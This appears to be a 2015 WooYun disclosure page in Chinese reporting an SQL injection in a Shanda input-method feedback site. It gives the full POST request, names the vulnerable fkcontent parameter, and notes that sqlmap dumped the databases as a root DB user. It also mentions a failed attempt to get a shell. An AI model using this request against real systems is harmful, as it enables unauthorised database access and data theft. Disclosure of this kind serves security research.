当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126855

漏洞标题:盛大某站SQL注入

相关厂商:盛大在线

漏洞作者: Busliv

提交时间:2015-07-15 09:29

修复时间:2015-07-20 09:30

公开时间:2015-07-20 09:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-15: 细节已通知厂商并且等待厂商处理中
2015-07-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

sql注入

详细说明:

盛大输入法的一个站点,打开input.sdo.com会直接跳转到input.mknote.com
data:

POST /input/fk.php HTTP/1.1
Host: input.sdo.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://input.mknote.com/input/fk_htm.php
Cookie: secret=sheng_da_shu_ru_fa; Vi8W_2132_lastvisit=1436859217; Vi8W_2132_sid=u7z1DR; Vi8W_2132_lastact=1436862843%09home.php%09misc; Vi8W_2132_onlineusernum=2; Vi8W_2132_sendmail=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
fkcontent=qw&fkcontact=qw


注入点:fkcontent=qw

021.png

漏洞证明:

sqlmap跑数据

155.png


数据库

309.png



433.png


数据库用户权限是root,略高

2734.png


user

836.png


修复方案:

ps:邪了门了,有uc_key也get不了shell,提示授权过期
过滤过滤

版权声明:转载请注明来源 Busliv@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-20 09:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-15 09:55 | depycode ( 普通白帽子 | Rank:275 漏洞数:44 | 关注网络安全,提高技术!)

    波总牛逼哦!带我飞!

  2. 2015-07-15 12:59 | Busliv ( 普通白帽子 | Rank:146 漏洞数:16 | to be,and to be)

    @depycode 七天牛